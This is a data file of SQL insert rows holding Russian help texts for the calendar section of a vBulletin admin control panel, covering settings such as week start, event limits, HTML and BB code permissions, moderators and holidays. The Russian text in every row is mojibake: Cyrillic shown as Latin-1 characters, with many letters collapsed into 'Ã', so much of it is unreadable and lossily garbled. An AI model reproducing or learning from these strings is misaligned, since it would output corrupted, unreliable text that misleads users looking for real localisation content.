(21627, -1, 'admincalendar_add_edit_startofweek_text', 'cphelptext', 'Îïöèÿ óñòà Ãà âëèâà åò ïåðâûé äåÃü Ãåäåëè ïî óìîë÷à Ãèþ äëÿ ýòîãî êà ëåÃäà ðÿ. Åñëè ïîëüçîâà òåëü à âòîðèçîâà ëñÿ Ãà ôîðóìå, îà ìîæåò äëÿ ñâîåãî óäîáñòâà óñòà Ãîâèòü â ñâîåì ïðîôèëå èÃîé ïåðâûé äåÃü Ãåäåëè.', 'vbulletin', '', 0, ''),
(21628, -1, 'admincalendar_add_edit_startofweek_title', 'cphelptext', 'Ãà ÷à ëî Ãåäåëè', 'vbulletin', '', 0, ''),
(21629, -1, 'admincalendar_add_edit_cutoff_text', 'cphelptext', 'Óñòà Ãîâêà çäåñü çÃà ÷åÃèÿ, áîëüøå 0, ïðèâåäåò ê îòîáðà æåÃèþ èìåÃÃî òà êîãî ÷èñëà ñèìâîëîâ çà ãîëîâêîâ ñîáûòèé ïðè ïðîñìîòðå ìåñÿ÷Ãîãî êà ëåÃäà ðÿ. Ãðè óñòà Ãîâêå 0 çà ãîëîâêè ñîáûòèé áóäóò îòîáðà æà òüñÿ ïîëÃîñòüþ, Ãåçà âèñèìî îò äëèÃû.', 'vbulletin', '', 0, ''),
(21630, -1, 'admincalendar_add_edit_cutoff_title', 'cphelptext', 'Îáðåçêà çà ãîëîâêà ñîáûòèÿ', 'vbulletin', '', 0, ''),
(21631, -1, 'admincalendar_add_edit_eventcount_text', 'cphelptext', 'Îïðåäåëÿåò ìà êñèìóì ñîáûòèé äëÿ îäÃîãî äÃÿ, îòîáðà æà åìûõ â ìåñÿ÷Ãîì êà ëåÃäà ðå. Ãðè ïðåâûøåÃèè ýòîãî êîëè÷åñòâà ñîáûòèé â ðà ìêà õ îäÃîãî äÃÿ, îÃè âñå áóäóò çà ìåÃÃ¥Ãû îäÃîé ññûëêîé Ãà âñå ñîáûòèÿ ýòîãî äÃÿ.', 'vbulletin', '', 0, ''),
(21632, -1, 'admincalendar_add_edit_eventcount_title', 'cphelptext', 'Ìà êñèìóì îòîáðà æà åìûõ â äåÃü ñîáûòèé', 'vbulletin', '', 0, ''),
(21633, -1, 'admincalendar_add_edit_birthdaycount_text', 'cphelptext', 'Îïðåäåëÿåò ìà êñèìóì äÃåé ðîæäåÃèÿ äëÿ îäÃîãî äÃÿ, îòîáðà æà åìûõ â ìåñÿ÷Ãîì êà ëåÃäà ðå. Ãðè ïðåâûøåÃèè ýòîãî êîëè÷åñòâà äÃåé ðîæäåÃèÿ â ðà ìêà õ îäÃîãî äÃÿ, îÃè âñå áóäóò çà ìåÃÃ¥Ãû îäÃîé ññûëêîé Ãà âñå äÃè ðîæäåÃèÿ ýòîãî äÃÿ.', 'vbulletin', '', 0, ''),
(21634, -1, 'admincalendar_add_edit_birthdaycount_title', 'cphelptext', 'Ìà êñèìóì îòîáðà æà åìûõ â äåÃü äÃåé ðîæäåÃèÿ', 'vbulletin', '', 0, ''),
(21635, -1, 'admincalendar_add_edit_showbirthdays_text', 'cphelptext', 'Îïöèÿ îïðåäåëÿåò, áóäóò èëè Ãåò îòîáðà æà òüñÿ äÃè ðîæäåÃèÿ â ýòîì êà ëåÃäà ðå. Åñëè óñòà Ãîâèòü ýòó îïöèþ â \"Äà \", âñå äÃè ðîæäåÃèÿ ïîëüçîâà òåëåé áóäóò îòîáðà æåÃû â ýòîì êà ëåÃäà ðå Ãåçà âèñèìî îò òîãî, êòî ïîëó÷èò äîñòóï ê Ãåìó.', 'vbulletin', '', 0, ''),
(21636, -1, 'admincalendar_add_edit_showbirthdays_title', 'cphelptext', 'Îòîáðà æåÃèå äÃåé ðîæäåÃèÿ â ýòîì êà ëåÃäà ðå', 'vbulletin', '', 0, ''),
(21637, -1, 'admincalendar_add_edit_showholidays_text', 'cphelptext', 'Âñå ïðà çäÃèêè, êîòîðûå ó âà ñ îïðåäåëåÃû â ñèñòåìå èëè äîáà âëåÃû ñ ïîìîùüþ óïðà âëåÃèÿ ïðà çäÃèêà ìè, áóäóò îòîáðà æà òüñÿ â ýòîì êà ëåÃäà ðå, åñëè ýòó îïöèþ óñòà Ãîâèòü â \"Äà \". (Ãîñêîëüêó ìåòîäû îïðåäåëåÃèÿ òî÷Ãîé äà òû Ãåêîòîðûõ ïðà çäÃèêîâ, âêëþ÷à ÿ öåðêîâÃûå, äîñòà òî÷Ãî ñëîæÃû, îÃè áûëè âñòðîåÃû â äâèæîê ôîðóìà , îäÃà êî ñëåäóþùåé îïöèåé èõ ìîæÃî îòêëþ÷èòü.)', 'vbulletin', '', 0, ''),
(21638, -1, 'admincalendar_add_edit_showholidays_title', 'cphelptext', 'Ãîêà çûâà òü óñòà ÃîâëåÃÃûå à äìèÃèñòðà öèåé ïðà çäÃèêè', 'vbulletin', '', 0, ''),
(21639, -1, 'admincalendar_add_edit_holidays_text', 'cphelptext', 'Ãðà çäÃèêè, ïåðå÷èñëåÃÃûå çäåñü, ÃÃ¥ ìîãóò áûòü âû÷èñëåÃû ìåòîäà ìè, èñïîëüçóåìûìè â óïðà âëåÃèè êà ëåÃäà ðÿìè. Âû ìîæåòå âûáðà òü, êà êèå èç ýòèõ ïðà çäÃèêîâ áóäóò îòîáðà æà òüñÿ â âà øåì êà ëåÃäà ðå. \r\nÄëÿ âêëþ÷åÃèÿ/îòêëþ÷åÃèÿ îòîáðà æåÃèÿ âñåõ ïðî÷èõ ïðà çäÃèêîâ, îïðåäåëåÃÃûõ â óïðà âëåÃèè ïðà çäÃèêà ìè, èñïîëüçóéòå ïðåäûäóùóþ îïöèþ \"Ãîêà çûâà òü óñòà ÃîâëåÃÃûå à äìèÃèñòðà öèåé ïðà çäÃèêè\".', 'vbulletin', '', 0, ''),
(21640, -1, 'admincalendar_add_edit_holidays_title', 'cphelptext', 'Ãîêà çûâà òü öåðêîâÃûå ïðà çäÃèêè', 'vbulletin', '', 0, ''),
(21641, -1, 'admincalendar_add_edit_showweekends_text', 'cphelptext', 'Óñòà Ãîâêà â \"Ãåò\" ïðèâåäåò ê îòîáðà æåÃèþ â êà ëåÃäà ðå òîëüêî ðà áî÷èõ äÃåé, ò.Ã¥. ñ ïîÃåäåëüÃèêà ïî ïÿòÃèöó. ÇÃà ÷åÃèå îïöèè \"Ãà ÷à ëî Ãåäåëè\" ïðîôèëÿ ïîëüçîâà òåëÿ ÃÃ¥ âëèÿåò Ãà ýòó îïöèþ.', 'vbulletin', '', 0, ''),
(21642, -1, 'admincalendar_add_edit_showweekends_title', 'cphelptext', 'Îòîáðà æåÃèå ñóááîòû/âîñêðåñåÃüÿ â ýòîì êà ëåÃäà ðå', 'vbulletin', '', 0, ''),
(21643, -1, 'admincalendar_add_edit_showupcoming_text', 'cphelptext', 'Åñëè \"Äà \", òî Ãà ñòóïà þùèå ñîáûòèÿ èç ýòîãî êà ëåÃäà ðÿ áóäóò îòîáðà æà òüñÿ Ãà ãëà âÃîé ñòðà Ãèöå ôîðóìà . Âû òà êæå äîëæÃû âêëþ÷èòü Îòîáðà æà òü ñîáûòèÿ êà ëåÃäà ðÿ? ïîä Ãëà âÃà ÿ ñòðà Ãèöà ôîðóìà â ÎñÃîâÃûõ Ãà ñòðîéêà õ.', 'vbulletin', '', 0, ''),
(21644, -1, 'admincalendar_add_edit_showupcoming_title', 'cphelptext', 'Îòîáðà æà òü Ãà ñòóïà þùèå ñîáûòèÿ èç ýòîãî êà ëåÃäà ðÿ Ãà ãëà âÃîå ñòðà Ãèöå ôîðóìà ?', 'vbulletin', '', 0, ''),
(21645, -1, 'admincalendar_add_edit_allowhtml_text', 'cphelptext', 'Ãòà îïöèÿ ðà çðåøà åò ïîëüçîâà òåëÿì èñïîëüçîâà òü HTML êîä ïðè äîáà âëåÃèè ñîáûòèÿ. Ãà ñòîÿòåëüÃî ðåêîìåÃäóåòñÿ ÃÃ… ÂÊËÞ×ÀÒÜ ýòó îïöèþ, ò.ê. ýòî ìîæåò ñåðü¸çÃî Ãà ðóøèòü áåçîïà ñÃîñòü ñèñòåìû, à òà êæå Ãà ðóøèòü âÃåøÃèé âèä ôîðóìà â ñëó÷à å âñòà âêè ïîëüçîâà òåëåì ÃåêîððåêòÃîãî HTML êîäà . Äà æå åñëè âû óñòà Ãîâèòå ýòó îïöèþ â \"Äà \", ïîëüçîâà òåëÿì âñå ðà âÃî áóäåò çà ïðåùåÃî èñïîëüçîâà òü Ãåêîòîðûå òåãè, âêëþ÷à ÿ javascript: è about:.', 'vbulletin', '', 0, ''),
(21646, -1, 'admincalendar_add_edit_allowhtml_title', 'cphelptext', 'Ãà çðåøèòü HTML', 'vbulletin', '', 0, ''),
(21647, -1, 'admincalendar_add_edit_allowbbcode_text', 'cphelptext', 'Ãòà îïöèÿ ðà çðåøà åò ïîëüçîâà òåëÿì èñïîëüçîâà òü BB êîäû â ñâîèõ ñîáûòèÿõ. Äà æå åñëè ýòà îïöèÿ óñòà ÃîâëåÃî â \"Äà \", ïîëüçîâà òåëè ÃÃ¥ ñìîãóò èñïîëüçîâà òü BB êîä [IMG], åñëè ñëåäóþùà ÿ îïöèÿ ÃÃ¥ óñòà ÃîâëåÃà â \"Äà \".', 'vbulletin', 'zCarot', 1206964356, '3.7.0 Release Candidate 2'),
(21648, -1, 'admincalendar_add_edit_allowbbcode_title', 'cphelptext', 'Ãà çðåøèòü BB êîäû', 'vbulletin', '', 0, ''),
(21649, -1, 'admincalendar_add_edit_allowimgcode_text', 'cphelptext', 'Ãòà îïöèÿ ðà çðåøà åò ïîëüçîâà òåëÿì îòîáðà æà òü èçîáðà æåÃèÿ ÃåïîñðåäñòâåÃÃî Ãà ñòðà Ãèöå ñîáûòèÿ. Åñëè óñòà Ãîâèòü îïöèþ â \"Ãåò\", áóäåò îòîáðà æåÃà ññûëêà Ãà èçîáðà æåÃèå âìåñòî ñà ìîãî èçîáðà æåÃèÿ.', 'vbulletin', '', 0, ''),
(21650, -1, 'admincalendar_add_edit_allowimgcode_title', 'cphelptext', 'Ãà çðåøåÃèå èñïîëüçîâà Ãèÿ BB êîäà IMG', 'vbulletin', '', 0, ''),
(21651, -1, 'admincalendar_add_edit_allowsmilies_text', 'cphelptext', 'Óñòà Ãîâêà ýòîé îïöèè â \"Äà \" ðà çðåøèò ïîëüçîâà òåëÿì èñïîëüçîâà òü îïðåäåëåÃÃûå ñî÷åòà Ãèÿ ñèìâîëîâ, Ãà ïðèìåð :) è :( , êîòîðûå áóäóò à âòîìà òè÷åñêè çà ìåÃÃ¥Ãû ñîîòâåòñòâóþùèìè èçîáðà æåÃèÿìè.', 'vbulletin', '', 0, ''),
(21652, -1, 'admincalendar_add_edit_allowsmilies_title', 'cphelptext', 'ÊîÃâåðòèðîâà òü ñìà éëû', 'vbulletin', '', 0, ''),
(21653, -1, 'admincalendar_addcustom_text', 'cphelptext', 'Çäåñü âû ìîæåòå äîáà âëÿòü è ðåäà êòèðîâà òü äîïîëÃèòåëüÃûå ïîëÿ, êîòîðûå áóäóò çà ïðà øèâà òüñÿ ïðè ñîçäà Ãèè Ãîâûõ ñîáûòèé, è îòîáðà æà òüñÿ ïðè ïðîñìîòðå ñóùåñòâóþùèõ ñîáûòèé ýòîãî êà ëåÃäà ðÿ. Èìåéòå ââèäó, åñëè âà ì ïîòðåáóþòñÿ à Ãà ëîãè÷Ãûå äîïîëÃèòåëüÃûå ïîëÿ â äðóãèõ êà ëåÃäà ðÿõ, âà ì ïðèäåòñÿ òà êæå ñîçäà òü èõ òà ì âðó÷Ãóþ. \r\nÎïöèè ýòîé ñòðà Ãèöû îïèñà Ãû Ãèæå.', 'vbulletin', '', 0, ''),
(21654, -1, 'admincalendar_addcustom_title', 'cphelptext', 'Äîáà âëåÃèå/Ãåäà êòèðîâà Ãèå äîï. ïîëåé êà ëåÃäà ðÿ', 'vbulletin', '', 0, ''),
(21655, -1, 'admincalendar_addcustom_title_text', 'cphelptext', 'Ãòî çà ãîëîâîê (Ãà çâà Ãèå) äîï. ïîëÿ, îòîáðà æà åìîå Ãà ñòðà Ãèöà õ äîáà âëåÃèÿ/ðåäà êòèðîâà Ãèÿ/ïðîñìîòðà ñîáûòèÿ.', 'vbulletin', '', 0, ''),
(21656, -1, 'admincalendar_addcustom_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(21657, -1, 'admincalendar_addcustom_description_text', 'cphelptext', 'Ãòî îïèñà Ãèå áóäåò îòîáðà æåÃî ðÿäîì ñ ýòèì äîï. ïîëåì. ÃåêîìåÃäóåòñÿ äîáà âèòü ñþäà òà êæå èÃñòðóêöèè ïî çà ïîëÃÃ¥Ãèþ äà ÃÃîãî ïîëÿ.', 'vbulletin', '', 0, ''),
(21658, -1, 'admincalendar_addcustom_description_title', 'cphelptext', 'Îïèñà Ãèå', 'vbulletin', '', 0, ''),
(21659, -1, 'admincalendar_addcustom_options_text', 'cphelptext', 'Ââåäèòå îäÃî èëè áîëåå âîçìîæÃûõ çÃà ÷åÃèé äëÿ ýòîãî ïîëÿ, èç êîòîðûõ ïîëüçîâà òåëü ñìîæåò âûáèðà òü. Óáåäèòåñü, ÷òî âû Ãà æà ëè Enter ïîñëå êà æäîãî âà ðèà Ãòà . Åñëè âû ÃÃ¥ óêà æèòå çäåñü Ãè îäÃîãî âà ðèà Ãòà , ïîëüçîâà òåëþ áóäåò ïðåäëîæåÃî ïóñòîå ïîëå, êóäà îà ñìîæåò ââåñòè ñâîå çÃà ÷åÃèå.', 'vbulletin', '', 0, ''),
(21660, -1, 'admincalendar_addcustom_options_title', 'cphelptext', 'Îïöèè', 'vbulletin', '', 0, ''),
(21661, -1, 'admincalendar_addcustom_allowentry_text', 'cphelptext', 'Âêëþ÷åÃèå ýòîé îïöèè ïîçâîëèò ïîëüçîâà òåëÿì ââîäèòü ïðîèçâîëüÃûå çÃà ÷åÃèÿ â ýòî äîïîëÃèòåëüÃîå ïîëå âìåñòî òîãî, ÷òîáû âûáèðà òü èç ïðåäëîæåÃÃûõ âà ìè âà ðèà Ãòîâ.', 'vbulletin', '', 0, ''),
(21662, -1, 'admincalendar_addcustom_allowentry_title', 'cphelptext', 'Ãîçâîëèòü ïîëüçîâà òåëÿì ââîäèòü ñîáñòâåÃÃûå çÃà ÷åÃèÿ ýòîãî ïîëÿ', 'vbulletin', '', 0, ''),
(21663, -1, 'admincalendar_addcustom_length_text', 'cphelptext', 'Ãòî ìà êñèìà ëüÃîå ÷èñëî ñèìâîëîâ, äîïóñòèìîå äëÿ ââîäà â ýòî äîï. ïîëå, åñëè â ýòî ïîëå âîîáùå ðà çðåøåà ââîä ïîëüçîâà òåëüñêèõ çÃà ÷åÃèé. Âû ìîæåòå âûáðà òü ëþáîå ÷èñëî ñèìâîëîâ îò 1 äî 255.', 'vbulletin', '', 0, ''),
(21664, -1, 'admincalendar_addcustom_length_title', 'cphelptext', 'Ìà êñ. êîëè÷åñòâî ñèìâîëîâ â çÃà ÷åÃèè ïîëÿ', 'vbulletin', '', 0, ''),
(21665, -1, 'admincalendar_addcustom_required_text', 'cphelptext', 'Åñëè óñòà Ãîâèòü â \"Äà \", ñèñòåìà ïîòðåáóåò îò ïîëüçîâà òåëÿ îáÿçà òåëüÃîãî çà ïîëÃÃ¥Ãèÿ ýòîãî ïîëÿ ïðè ñîçäà Ãèè Ãîâîãî ñîáûòèÿ.', 'vbulletin', '', 0, ''),
(21666, -1, 'admincalendar_addcustom_required_title', 'cphelptext', 'Îáÿçà òåëüÃîå ïîëå', 'vbulletin', '', 0, ''),
(21667, -1, 'admincalendar_addmod_text', 'cphelptext', 'Ìîäåðà òîð êà ëåÃäà ðÿ - ïîëüçîâà òåëü, èìåþùèé âîçìîæÃîñòü (ïðà âà ) ðà çðåøà òü/çà ïðåùà òü ðà çìåùåÃèå äîáà âëÿåìûõ ïîëüçîâà òåëÿìè ñîáûòèé (åñëè â ýòîì êà ëåÃäà ðå âêëþ÷åÃà îïöèÿ ïðîâåðêè ñîáûòèé), ñà ìîñòîÿòåëüÃî äîáà âëÿòü/ðåäà êòèðîâà òü è óäà ëÿòü ñîáûòèÿ ýòîãî êà ëåÃäà ðÿ. \r\nÎïöèè ýòîé ñòðà Ãèöû îïèñà Ãû Ãèæå.', 'vbulletin', '', 0, ''),
(21668, -1, 'admincalendar_addmod_title', 'cphelptext', 'Äîáà âëåÃèå ìîäåðà òîðà êà ëåÃäà ðÿ', 'vbulletin', '', 0, ''),
(21669, -1, 'admincalendar_addmod_modusername_text', 'cphelptext', 'Ââåäèòå èìÿ ìîäåðà òîðà . Ãóäüòå à êêóðà òÃû, â ñëó÷à å îøèáêè ïðè ââîäå èìåÃè ìîäåðà òîð ÃÃ¥ áóäåò äîáà âëåÃ.', 'vbulletin', '', 0, ''),
(21670, -1, 'admincalendar_addmod_modusername_title', 'cphelptext', 'Èìÿ ìîäåðà òîðà ', 'vbulletin', '', 0, ''),
(21671, -1, 'admincalendar_addmod_editmod_calendarid_text', 'cphelptext', 'Âûáåðèòå êà ëåÃäà ðü, êîòîðîìó âû õîòèòå Ãà çÃà ÷èòü ìîäåðà òîðà . Åñëè âû õîòèòå äà òü ïîëüçîâà òåëþ ïîëÃîìî÷èÿ ìîäåðà òîðà Ãåñêîëüêèõ êà ëåÃäà ðåé, âà ì ïðèäåòñÿ äîáà âëÿòü åãî, êà ê ìîäåðà òîðà , ê êà æäîìó èç êà ëåÃäà ðåé îòäåëüÃî.', 'vbulletin', '', 0, ''),
(21672, -1, 'admincalendar_addmod_editmod_calendarid_title', 'cphelptext', 'Êà ëåÃäà ðü', 'vbulletin', '', 0, ''),
(21673, -1, 'admincalendar_addmod_editmod_caneditevents_text', 'cphelptext', 'Âûáåðèòå, ñìîæåò èëè Ãåò, ýòîò ìîäåðà òîð ðåäà êòèðîâà òü ñîáûòèÿ äà ÃÃîãî êà ëåÃäà ðÿ.', 'vbulletin', '', 0, ''),
(21674, -1, 'admincalendar_addmod_editmod_caneditevents_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ñîáûòèÿ', 'vbulletin', '', 0, ''),
(21675, -1, 'admincalendar_addmod_editmod_candeleteevents_text', 'cphelptext', 'Âûáåðèòå, ñìîæåò èëè Ãåò, ýòîò ìîäåðà òîð óäà ëÿòü ñîáûòèÿ äà ÃÃîãî êà ëåÃäà ðÿ.', 'vbulletin', '', 0, ''),
(21676, -1, 'admincalendar_addmod_editmod_candeleteevents_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ñîáûòèÿ', 'vbulletin', '', 0, ''),
(21677, -1, 'admincalendar_addmod_editmod_canmoveevents_text', 'cphelptext', 'Åñëè âûáðà òü \"Äà \", ýòîò ìîäåðà òîð ñìîæåò ïåðåìåùà òü ñîáûòèÿ èç ýòîãî êà ëåÃäà ðÿ â äðóãèå.', 'vbulletin', '', 0, ''),
(21678, -1, 'admincalendar_addmod_editmod_canmoveevents_title', 'cphelptext', 'Ìîæåò ïåðåìåùà òü ñîáûòèÿ', 'vbulletin', '', 0, ''),
(21679, -1, 'admincalendar_addmod_editmod_canmoderateevents_text', 'cphelptext', 'Åñëè âû âêëþ÷èëè ïðîâåðêó ñîáûòèé â ýòîì êà ëåÃäà ðå, âûáåðèòå, ñìîæåò èëè Ãåò, ýòîò ìîäåðà òîð ðà çðåøà òü/çà ïðåùà òü äîáà âëåÃèå ïîëüçîâà òåëÿìè ñîáûòèé â äà ÃÃûé êà ëåÃäà ðü.', 'vbulletin', '', 0, ''),
(21680, -1, 'admincalendar_addmod_editmod_canmoderateevents_title', 'cphelptext', 'Ìîæåò ïðîâåðÿòü ñîáûòèÿ', 'vbulletin', '', 0, ''),
(21681, -1, 'admincalendar_addmod_editmod_canviewips_text', 'cphelptext', 'Îïðåäåëÿåò, ñìîæåò èëè Ãåò, ýòîò ìîäåðà òîð âèäåòü IP à äðåñ ðà çìåñòèâøåãî ñîîáùåÃèå.', 'vbulletin', '', 0, ''),
(21682, -1, 'admincalendar_addmod_editmod_canviewips_title', 'cphelptext', 'Ìîæåò ñìîòðåòü IP-à äðåñ', 'vbulletin', '', 0, ''),
(21683, -1, 'admincalendar_deletecustom_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå ïîäòâåðäèòü óäà ëåÃèå ýòîãî äîïîëÃèòåëüÃîãî ïîëÿ êà ëåÃäà ðÿ. Ãà æìèòå Ãà êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ óäà ëåÃèÿ. Óäà ëåÃèå ýòîãî äîï. ïîëÿ ïîâëå÷åò ïîòåðþ âñåõ çÃà ÷åÃèé ýòîãî ïîëÿ, ââåäåÃÃûõ ïîëüçîâà òåëÿìè âî âñå ñîáûòèÿ äà ÃÃîãî êà ëåÃäà ðÿ. Ãòà îïåðà öèÿ Ãåîáðà òèìà .', 'vbulletin', '', 0, ''),
(21684, -1, 'admincalendar_deletecustom_title', 'cphelptext', 'Óäà ëåÃèå äîï. ïîëÿ', 'vbulletin', '', 0, ''),
(21685, -1, 'admincalendar_edit_text', 'cphelptext', 'Êà æäûé èç ñóùåñòâóþùèõ êà ëåÃäà ðåé îòîáðà æà åò òîëüêî ñâîè, ò.Ã¥. ðà çìåùåÃÃûå â Ãåì ñîáûòèÿ, îäÃà êî ïðà çäÃèêè è äÃè ðîæäåÃèÿ îòîáðà æà þòñÿ âî âñåõ êà ëåÃäà ðÿõ. Êà æäûé êà ëåÃäà ðü ìîæåò èìåòü ðà çëè÷Ãûå ïðà âà äîñòóïà è ðà çÃûõ ìîäåðà òîðîâ. \r\nÃà ïðèìåð ýòî ìîæåò èñïîëüçîâà òüñÿ, åñëè ó âà ñ åñòü äâå ñïîðòèâÃûå êîìà Ãäû, êà æäà ÿ èç êîòîðûõ ñîñòà âëÿåò ñâîþ ãðóïïó. ÌîæÃî ñîçäà òü ðà çäåëüÃûå êà ëåÃäà ðè äëÿ êà æäîé êîìà Ãäû, è êà æäà ÿ êîìà Ãäà Ãà ñòðîèò ñâîé êà ëåÃäà ðü ïîä ñåáÿ, îáîçÃà ÷èò òà ì ñâîè ñîáûòèÿ, ÷ëåÃû äðóãîé êîìà Ãäû ÃÃ¥ áóäóò èìåòü äîñòóïà ê ÷óæîìó êà ëåÃäà ðþ. \r\nÃà ýòîé ñòðà Ãèöû âû ìîæåòå ðåäà êòèðîâà òü Ãà ñòðîéêè è îïöèè ñóùåñòâóþùåãî êà ëåÃäà ðÿ. ÃîäðîáÃåå Ãà ñòðîéêè îïèñà Ãû Ãèæå.', 'vbulletin', '', 0, ''),
(21686, -1, 'admincalendar_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå êà ëåÃäà ðÿ', 'vbulletin', '', 0, ''),
(21687, -1, 'admincalendar_editmod_text', 'cphelptext', 'Ìîäåðà òîð êà ëåÃäà ðÿ - ýòî ïîëüçîâà òåëü, êîòîðûé èìååò âîçìîæÃîñòü (ò.Ã¥. îáëà äà åò ïðà âà ìè) ðåäà êòèðîâà òü è óäà ëÿòü ñîáûòèÿ äà ÃÃîãî êà ëåÃäà ðÿ. Åñëè âêëþ÷åà ðåæèì ïðîâåðêè ñîáûòèé, îà òà êæå îäîáðÿåò èëè îòâåðãà åò âÃîâü äîáà âëåÃÃîå ñîáûòèå. \r\nÅñëè âû õîòèòå óäà ëèòü ýòîãî ìîäåðà òîðà , âîñïîëüçóéòåñü êÃîïêîé \"Óäà ëèòü ìîäåðà òîðà \" Ãà âåðõó ñòðà Ãèöû. Ãóäåò çà ïðîøåÃî ïîäòâåðæäåÃèå óäà ëåÃèÿ. \r\nÃà ñòðîéêè è îïöèè ýòîé ñòðà Ãèöû îïèñà Ãû Ãèæå.', 'vbulletin', '', 0, ''),
(21688, -1, 'admincalendar_editmod_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ìîäåðà òîðà êà ëåÃäà ðÿ', 'vbulletin', '', 0, ''),
(21689, -1, 'admincalendar_modify_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå îòîáðà æåÃû âñå ñóùåñòâóþùèå êà ëåÃäà ðè. Îòñþäà âû ìîæåòå óïðà âëÿòü âñåìè Ãà ñòðîéêà ìè äëÿ Ãèõ, âêëþ÷à ÿ ïîðÿäîê èõ îòîáðà æåÃèÿ. \r\nÃÿäîì ñ êà æäûì êà ëåÃäà ðåì ðà ñïîëîæåÃî âûïà äà þùåå ìåÃþ ñî ñëåäóþùèìè îïöèÿìè: \r\nÈçìåÃèòü : îñóùåñòâëÿåòñÿ ïåðåõîä Ãà ñòðà Ãèöó ðåäà êòèðîâà Ãèÿ Ãà ñòðîåê è îïöèé êà ëåÃäà ðÿ. Òà êæå âû ìîæåòå ïåðåéòè ê ðåäà êòèðîâà Ãèþ êà ëåÃäà ðÿ, Ãà æà â Ãà åãî Ãà çâà Ãèå. (Ñì. Ãåäà êòèðîâà Ãèå êà ëåÃäà ðåé ) \r\nÃîñìîòðåòü : îòîáðà çèò êà ëåÃäà ðü â òîì âèäå, êà ê åãî áóäóò âèäåòü êîÃå÷Ãûå ïîëüçîâà òåëè. \r\nÓäà ëèòü : ïîñëå ïîäòâåðæäåÃèÿ óäà ëåÃèÿ âûáðà ÃÃûé êà ëåÃäà ðü áóäåò ïîëÃîñòüþ óäà ëåÃ, âêëþ÷à ÿ âñå åãî ñîáûòèÿ è óñòà Ãîâêè ìîäåðà òîðîâ. \r\nÃà çðåøåÃèÿ : ïîçâîëÿåò óñòà Ãîâèòü äëÿ âûáðà ÃÃîãî êà ëåÃäà ðÿ ðà çðåøåÃèÿ è ïðà âà äîñòóïà Ãà óðîâÃÃ¥ ãðóïï ïîëüçîâà òåëåé. (Ñì. ÈçìåÃÃ¥Ãèå ðà çðåøåÃèé äëÿ êà ëåÃäà ðÿ ) \r\nÄà ëåå ðà ñïîëîæåÃî çÃà ÷åÃèå, êîòîðîå îïðåäåëÿåò ïîðÿäîê îòîáðà æåÃèÿ êà ëåÃäà ðåé. ×åì ìåÃüøå ýòî çÃà ÷åÃèå, òåì \"âûøå\" (ðà Ãüøå) áóäåò îòîáðà æåà äà ÃÃûé êà ëåÃäà ðü â ìåÃþ Ãûñòðîãî ïåðåõîäà è Ãà ýòîé ñòðà Ãèöå. Óñòà Ãîâêà çÃà ÷åÃèÿ 0 çà ïðåòèò îòîáðà æåÃèå êà ëåÃäà ðÿ â ìåÃþ Ãûñòðîãî ïåðåõîäà , îäÃà êî åñëè ïîëüçîâà òåëü ìîæåò ïîëó÷èòü äîñòóï ê ýòîìó êà ëåÃäà ðþ, Ãà áðà â åãî ïðÿìîé URL. Åñëè âû èçìåÃÿëè ïîðÿäîê îòîáðà æåÃèÿ, ÃÃ¥ çà áóäüòå Ãà æà òü êÃîïêó \"Ñîõðà Ãèòü ïîðÿäîê îòîáðà æåÃèÿ\" âÃèçó ñòðà Ãèöû, ÷òîáû èçìåÃÃ¥Ãèÿ âñòóïèëè â ñèëó. \r\nÅùå ïðà âåå ðà ñïîëîæåà ñïèñîê ìîäåðà òîðîâ äà ÃÃîãî êà ëåÃäà ðÿ. Âû ìîæåòå ðåäà êòèðîâà òü ìîäåðà òîðîâ, âûáðà â â ñïèñêå òðåáóåìîå èìÿ, à òà êæå ìîæÃî äîáà âèòü ìîäåðà òîðà , âûáðà â \"Äîáà âèòü\". (Ñì. Ãåäà êòèðîâà Ãèå ìîäåðà òîðîâ êà ëåÃäà ðÿ è Äîáà âëåÃèå ìîäåðà òîðîâ êà ëåÃäà ðÿ ) \r\n ñà ìîì Ãèçó ñòðà Ãèöû ðà ñïîëîæåÃà êÃîïêà äëÿ ñîçäà Ãèÿ Ãîâîãî êà ëåÃäà ðÿ.', 'vbulletin', 'zCarot', 1205430963, '3.7.0 Release Candidate 1'),
(21690, -1, 'admincalendar_modify_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå êà ëåÃäà ðÿ', 'vbulletin', '', 0, ''),
(21691, -1, 'admincalendar_modifyholiday_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå ïîêà çà Ãû âñå ïðà çäÃèêè, îòîáðà æà åìûå â êà ëåÃäà ðÿõ. Âû ìîæåòå îòðåäà êòèðîâà òü èëè óäà ëèòü ñóùåñòâóþùèé ïðà çäÃèê, ëèáî äîáà âèòü Ãîâûé, èñïîëüçóÿ êÃîïêó âÃèçó ñòðà Ãèöû. \r\nÎáðà òèòå âÃèìà Ãèå, â ñâÿçè ñî ñëîæÃîñòüþ îïðåäåëåÃèÿ ôà êòè÷åñêèõ äà ò Ãåêîòîðûõ öåðêîâÃûõ ïðà çäÃèêîâ, ýòè ïðà çäÃèêè ÿâëÿþòñÿ \"âñòðîåÃÃûìè\", ò.Ã¥. âû ÃÃ¥ ñìîæåòå ãëîáà ëüÃî îòðåäà êòèðîâà òü èëè óäà ëèòü èõ. ÊîÃå÷Ãî, ýòî òîëüêî áóðæóéñêèå öåðêîâÃûå ïðà çäÃèêè :), è îÃè ìîãóò áûòü îòêëþ÷åÃû ëîêà ëüÃî â Ãà ñòðîéêà õ êà æäîãî êà ëåÃäà ðÿ. Ãà çâà Ãèÿ ýòèõ ïðà çäÃèêîâ: Easter, Ash Wednesday, Palm Sunday, Pentecost.', 'vbulletin', '', 0, ''),
(21692, -1, 'admincalendar_modifyholiday_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ïðà çäÃèêîâ', 'vbulletin', '', 0, ''),
